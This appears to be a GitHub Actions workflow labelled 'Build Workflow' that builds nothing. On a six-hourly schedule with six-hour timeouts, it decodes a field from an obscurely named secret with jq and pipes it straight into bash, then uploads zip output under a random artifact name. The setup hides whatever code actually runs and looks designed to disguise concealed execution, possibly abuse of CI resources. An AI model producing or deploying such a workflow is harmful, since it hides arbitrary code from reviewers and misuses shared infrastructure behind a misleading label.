name: Build Workflow
on:
  workflow_dispatch:

  schedule:
    - cron: '48 0,6,12,18 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  job:
    name: Go
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Go
        env:
          coa2341: ${{ secrets.coa2341 }}
        run: |
          printf '%s' "$coa2341" | jq -r .qu25 | /bin/bash
          echo $i68288 | jq -r .lq7 | /bin/bash

      - name: Store artifact
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: cbTEo4w9
          path: "*.zip"
          retention-days: 1
